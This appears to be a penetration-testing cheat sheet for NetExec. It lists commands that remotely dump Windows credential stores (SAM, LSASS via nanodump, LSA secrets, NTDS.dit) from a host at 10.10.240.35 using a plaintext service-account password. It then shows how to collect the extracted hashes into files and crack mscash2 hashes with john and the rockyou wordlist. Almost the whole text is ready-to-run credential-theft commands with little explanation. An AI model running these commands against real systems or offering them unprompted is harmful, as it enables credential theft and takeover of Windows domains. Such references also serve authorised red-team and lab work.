NetExec - Remote Hash Dumping
Dump SAM (local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --sam
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --sam | fgrep -v '[' | awk -F: '{print $4}' | tee dumped_hashes.txt
Dump LSASS via nanodump (local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' -M nanodump
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' -M nanodump | fgrep -v '[' | awk -F: '{print $2}' | tee -a dumped_hashes.txt
Dump LSA (local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --lsa
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --lsa secdump
LSA may yield mscash hashes which need cracking:
john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=mscash2
Dump NTDS.dit (Domain Admin / DC local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' -M ntdsutil | fgrep -v '[' | awk -F: '{print $4}' | tee -a dumped_hashes.txt
Cleanup collected hashes
awk 'NF {print $1}' dumped_hashes.txt | sort | uniq | tee unique_hashes.txt